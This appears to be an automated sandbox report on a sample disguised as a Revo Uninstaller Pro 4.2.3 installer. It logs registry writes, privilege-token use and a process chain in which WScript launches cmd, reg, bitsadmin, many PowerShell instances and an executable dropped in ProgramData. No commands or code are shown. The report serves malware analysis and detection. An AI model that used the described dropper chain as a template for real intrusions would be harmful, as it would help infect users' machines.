Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{DD72B942-27D2-4A3C-9353-FA0441FBABA0}\ProgID C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{FB562550-BBE6-4298-861A-5C0A6562C272} C:\Users\Admin\AppData\Local\Temp\is-3CNGV.tmp\Revo Uninstaller Pro 4.2.3.tmp N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{FB562550-BBE6-4298-861A-5C0A6562C272}\Shell C:\Users\Admin\AppData\Local\Temp\is-3CNGV.tmp\Revo Uninstaller Pro 4.2.3.tmp N/A
Key created \REGISTRY\MACHINE\Software\Classes\RevoUninstallerPro.ruel\DefaultIcon C:\Users\Admin\AppData\Local\Temp\is-3CNGV.tmp\Revo Uninstaller Pro 4.2.3.tmp N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{2C5515DC-2A7E-4BFD-B813-CACC2B685EB7}\InprocServer32\ = "C:\\Program Files\\VS Revo Group\\Revo Uninstaller Pro\\RUExt.dll" C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shellex\ContextMenuHandlers\RUShellExt C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\Software\Classes\CLSID\{FB562550-BBE6-4298-861A-5C0A6562C272}\ShellFolder C:\Users\Admin\AppData\Local\Temp\is-3CNGV.tmp\Revo Uninstaller Pro 4.2.3.tmp N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\RevoUninstallerPro.ruel\shell C:\Users\Admin\AppData\Local\Temp\is-3CNGV.tmp\Revo Uninstaller Pro 4.2.3.tmp N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\RevoUninstallerPro.ruel\shell\open C:\Users\Admin\AppData\Local\Temp\is-3CNGV.tmp\Revo Uninstaller Pro 4.2.3.tmp N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{37B86290-9C1A-453F-BFA7-CB6EC9CEC00F}\5.1\HELPDIR\ = "C:\\Program Files\\VS Revo Group\\Revo Uninstaller Pro\\" C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{58DF91C9-795D-4356-9568-7F149ED299B4}\ProxyStubClsid32 C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\Local Settings C:\Users\Admin\AppData\Local\Temp\is-AC2M1.tmp\0b3937c39ea113c3352090ac5ce26103_JaffaCakes118.tmp N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{FB562550-BBE6-4298-861A-5C0A6562C272}\Shell\Open\command C:\Users\Admin\AppData\Local\Temp\is-3CNGV.tmp\Revo Uninstaller Pro 4.2.3.tmp N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{FB562550-BBE6-4298-861A-5C0A6562C272}\ShellFolder\Attributes = "48" C:\Users\Admin\AppData\Local\Temp\is-3CNGV.tmp\Revo Uninstaller Pro 4.2.3.tmp N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\AppID\RUExt.DLL C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{2C5515DC-2A7E-4BFD-B813-CACC2B685EB7} C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\LicProtector.LicProtectorEXE510\ = "LicProtector Object" C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\RevoUninstallerPro.ruel\DefaultIcon C:\Users\Admin\AppData\Local\Temp\is-3CNGV.tmp\Revo Uninstaller Pro 4.2.3.tmp N/A
Key created \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\RevoUninstallerPro.ruel C:\Users\Admin\AppData\Local\Temp\is-3CNGV.tmp\Revo Uninstaller Pro 4.2.3.tmp N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{2C5515DC-2A7E-4BFD-B813-CACC2B685EB7}\InprocServer32\ThreadingModel = "Apartment" C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{DD72B942-27D2-4A3C-9353-FA0441FBABA0}\ = "LicProtector Object" C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{DD72B942-27D2-4A3C-9353-FA0441FBABA0}\TypeLib\ = "{37B86290-9C1A-453F-BFA7-CB6EC9CEC00F}" C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\RevoUninstallerPro.ruel\shell\open\command C:\Users\Admin\AppData\Local\Temp\is-3CNGV.tmp\Revo Uninstaller Pro 4.2.3.tmp N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile\shellex\ContextMenuHandlers\RUShellExt C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Folder\shellex\ContextMenuHandlers\RUShellExt C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{37B86290-9C1A-453F-BFA7-CB6EC9CEC00F} C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{58DF91C9-795D-4356-9568-7F149ED299B4} C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID C:\Users\Admin\AppData\Local\Temp\is-3CNGV.tmp\Revo Uninstaller Pro 4.2.3.tmp N/A
Key created \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\.ruel C:\Users\Admin\AppData\Local\Temp\is-3CNGV.tmp\Revo Uninstaller Pro 4.2.3.tmp N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\AppID\{1D928D64-60D3-4FAC-B810-C4D9D8A680CF} C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{2C5515DC-2A7E-4BFD-B813-CACC2B685EB7}\ = "RUShellExt Class" C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{37B86290-9C1A-453F-BFA7-CB6EC9CEC00F}\5.1\0\win32 C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{37B86290-9C1A-453F-BFA7-CB6EC9CEC00F}\5.1\0\win32\ = "C:\\Program Files\\VS Revo Group\\Revo Uninstaller Pro\\ruplp.exe" C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{37B86290-9C1A-453F-BFA7-CB6EC9CEC00F}\5.1\HELPDIR C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{58DF91C9-795D-4356-9568-7F149ED299B4}\ = "ILicProtectorEXE510" C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{DD72B942-27D2-4A3C-9353-FA0441FBABA0}\LocalServer32\ = "C:\\PROGRA~1\\VSREVO~1\\REVOUN~1\\ruplp.exe" C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{DD72B942-27D2-4A3C-9353-FA0441FBABA0}\Version C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{FB562550-BBE6-4298-861A-5C0A6562C272}\ = "Revo Uninstaller Pro" C:\Users\Admin\AppData\Local\Temp\is-3CNGV.tmp\Revo Uninstaller Pro 4.2.3.tmp N/A
Key created \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\RevoUninstallerPro.ruel\shell\open C:\Users\Admin\AppData\Local\Temp\is-3CNGV.tmp\Revo Uninstaller Pro 4.2.3.tmp N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Msi.Package\shellex\ContextMenuHandlers\RUShellExt\ = "{2C5515DC-2A7E-4BFD-B813-CACC2B685EB7}" C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{37B86290-9C1A-453F-BFA7-CB6EC9CEC00F}\5.1\ = "LicProtector Library" C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{DD72B942-27D2-4A3C-9353-FA0441FBABA0} C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\LicProtector.LicProtectorEXE510\Clsid\ = "{DD72B942-27D2-4A3C-9353-FA0441FBABA0}" C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exe N/A
Key created \REGISTRY\MACHINE\Software\Classes\CLSID\{FB562550-BBE6-4298-861A-5C0A6562C272}\DefaultIcon C:\Users\Admin\AppData\Local\Temp\is-3CNGV.tmp\Revo Uninstaller Pro 4.2.3.tmp N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-AC2M1.tmp\0b3937c39ea113c3352090ac5ce26103_JaffaCakes118.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-AC2M1.tmp\0b3937c39ea113c3352090ac5ce26103_JaffaCakes118.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-3CNGV.tmp\Revo Uninstaller Pro 4.2.3.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-3CNGV.tmp\Revo Uninstaller Pro 4.2.3.tmp N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-3CNGV.tmp\Revo Uninstaller Pro 4.2.3.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-3CNGV.tmp\Revo Uninstaller Pro 4.2.3.tmp N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\ProgramData\uzlyLtM20yixSdV\111.exe N/A
N/A N/A C:\ProgramData\uzlyLtM20yixSdV\111.exe N/A
N/A N/A C:\ProgramData\uzlyLtM20yixSdV\111.exe N/A
N/A N/A C:\ProgramData\uzlyLtM20yixSdV\111.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\ProgramData\uzlyLtM20yixSdV\7z.exe N/A
Token: 35 N/A C:\ProgramData\uzlyLtM20yixSdV\7z.exe N/A
Token: SeSecurityPrivilege N/A C:\ProgramData\uzlyLtM20yixSdV\7z.exe N/A
Token: SeSecurityPrivilege N/A C:\ProgramData\uzlyLtM20yixSdV\7z.exe N/A
Token: SeRestorePrivilege N/A C:\ProgramData\uzlyLtM20yixSdV\7z.exe N/A
Token: 35 N/A C:\ProgramData\uzlyLtM20yixSdV\7z.exe N/A
Token: SeSecurityPrivilege N/A C:\ProgramData\uzlyLtM20yixSdV\7z.exe N/A
Token: SeSecurityPrivilege N/A C:\ProgramData\uzlyLtM20yixSdV\7z.exe N/A
Token: SeRestorePrivilege N/A C:\ProgramData\uzlyLtM20yixSdV\7z.exe N/A
Token: 35 N/A C:\ProgramData\uzlyLtM20yixSdV\7z.exe N/A
Token: SeSecurityPrivilege N/A C:\ProgramData\uzlyLtM20yixSdV\7z.exe N/A
Token: SeSecurityPrivilege N/A C:\ProgramData\uzlyLtM20yixSdV\7z.exe N/A
Token: SeDebugPrivilege N/A C:\ProgramData\uzlyLtM20yixSdV\111.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-AC2M1.tmp\0b3937c39ea113c3352090ac5ce26103_JaffaCakes118.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-3CNGV.tmp\Revo Uninstaller Pro 4.2.3.tmp N/A
N/A N/A C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe N/A
N/A N/A C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe N/A
N/A N/A C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe N/A
N/A N/A C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe N/A
N/A N/A C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe N/A
N/A N/A C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe N/A
N/A N/A C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe N/A
N/A N/A C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe N/A
N/A N/A C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe N/A
N/A N/A C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe N/A
N/A N/A C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe N/A
N/A N/A C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe N/A
N/A N/A C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe N/A
N/A N/A C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe N/A
N/A N/A C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe N/A
N/A N/A C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe N/A
N/A N/A C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe N/A
N/A N/A C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe N/A
N/A N/A C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe N/A
N/A N/A C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe N/A
N/A N/A C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe N/A
N/A N/A C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe N/A
N/A N/A C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe N/A
N/A N/A C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe N/A
N/A N/A C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe N/A
N/A N/A C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe N/A
N/A N/A C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe N/A
N/A N/A C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe N/A
N/A N/A C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe N/A
N/A N/A C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe N/A
N/A N/A C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe N/A
N/A N/A C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe N/A
N/A N/A C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe N/A
N/A N/A C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe N/A
N/A N/A C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe N/A
N/A N/A C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe N/A
N/A N/A C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe N/A
N/A N/A C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe N/A
N/A N/A C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4092 wrote to memory of 4540 N/A C:\Users\Admin\AppData\Local\Temp\0b3937c39ea113c3352090ac5ce26103_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\is-AC2M1.tmp\0b3937c39ea113c3352090ac5ce26103_JaffaCakes118.tmp
PID 4092 wrote to memory of 4540 N/A C:\Users\Admin\AppData\Local\Temp\0b3937c39ea113c3352090ac5ce26103_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\is-AC2M1.tmp\0b3937c39ea113c3352090ac5ce26103_JaffaCakes118.tmp
PID 4092 wrote to memory of 4540 N/A C:\Users\Admin\AppData\Local\Temp\0b3937c39ea113c3352090ac5ce26103_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\is-AC2M1.tmp\0b3937c39ea113c3352090ac5ce26103_JaffaCakes118.tmp
PID 4540 wrote to memory of 4852 N/A C:\Users\Admin\AppData\Local\Temp\is-AC2M1.tmp\0b3937c39ea113c3352090ac5ce26103_JaffaCakes118.tmp C:\Windows\SysWOW64\WScript.exe
PID 4540 wrote to memory of 4852 N/A C:\Users\Admin\AppData\Local\Temp\is-AC2M1.tmp\0b3937c39ea113c3352090ac5ce26103_JaffaCakes118.tmp C:\Windows\SysWOW64\WScript.exe
PID 4540 wrote to memory of 4852 N/A C:\Users\Admin\AppData\Local\Temp\is-AC2M1.tmp\0b3937c39ea113c3352090ac5ce26103_JaffaCakes118.tmp C:\Windows\SysWOW64\WScript.exe
PID 4540 wrote to memory of 3948 N/A C:\Users\Admin\AppData\Local\Temp\is-AC2M1.tmp\0b3937c39ea113c3352090ac5ce26103_JaffaCakes118.tmp C:\Program Files (x86)\Revo Uninstaller Pro 4.2.3.exe
PID 4540 wrote to memory of 3948 N/A C:\Users\Admin\AppData\Local\Temp\is-AC2M1.tmp\0b3937c39ea113c3352090ac5ce26103_JaffaCakes118.tmp C:\Program Files (x86)\Revo Uninstaller Pro 4.2.3.exe
PID 4540 wrote to memory of 3948 N/A C:\Users\Admin\AppData\Local\Temp\is-AC2M1.tmp\0b3937c39ea113c3352090ac5ce26103_JaffaCakes118.tmp C:\Program Files (x86)\Revo Uninstaller Pro 4.2.3.exe
PID 4852 wrote to memory of 4616 N/A C:\Windows\SysWOW64\WScript.exe C:\Windows\SysWOW64\cmd.exe
PID 4852 wrote to memory of 4616 N/A C:\Windows\SysWOW64\WScript.exe C:\Windows\SysWOW64\cmd.exe
PID 4852 wrote to memory of 4616 N/A C:\Windows\SysWOW64\WScript.exe C:\Windows\SysWOW64\cmd.exe
PID 3948 wrote to memory of 3340 N/A C:\Program Files (x86)\Revo Uninstaller Pro 4.2.3.exe C:\Users\Admin\AppData\Local\Temp\is-3CNGV.tmp\Revo Uninstaller Pro 4.2.3.tmp
PID 3948 wrote to memory of 3340 N/A C:\Program Files (x86)\Revo Uninstaller Pro 4.2.3.exe C:\Users\Admin\AppData\Local\Temp\is-3CNGV.tmp\Revo Uninstaller Pro 4.2.3.tmp
PID 3948 wrote to memory of 3340 N/A C:\Program Files (x86)\Revo Uninstaller Pro 4.2.3.exe C:\Users\Admin\AppData\Local\Temp\is-3CNGV.tmp\Revo Uninstaller Pro 4.2.3.tmp
PID 4616 wrote to memory of 3704 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 4616 wrote to memory of 3704 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 4616 wrote to memory of 3704 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 4616 wrote to memory of 5076 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\bitsadmin.exe
PID 4616 wrote to memory of 5076 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\bitsadmin.exe
PID 4616 wrote to memory of 5076 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\bitsadmin.exe
PID 4616 wrote to memory of 1572 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4616 wrote to memory of 1572 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4616 wrote to memory of 1572 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4616 wrote to memory of 4312 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4616 wrote to memory of 4312 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4616 wrote to memory of 4312 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4616 wrote to memory of 4692 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4616 wrote to memory of 4692 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4616 wrote to memory of 4692 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4616 wrote to memory of 636 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4616 wrote to memory of 636 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4616 wrote to memory of 636 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4616 wrote to memory of 1200 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4616 wrote to memory of 1200 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4616 wrote to memory of 1200 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4616 wrote to memory of 3856 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4616 wrote to memory of 3856 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4616 wrote to memory of 3856 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4616 wrote to memory of 964 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4616 wrote to memory of 964 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4616 wrote to memory of 964 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4616 wrote to memory of 1136 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4616 wrote to memory of 1136 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4616 wrote to memory of 1136 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4616 wrote to memory of 2932 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4616 wrote to memory of 2932 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4616 wrote to memory of 2932 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
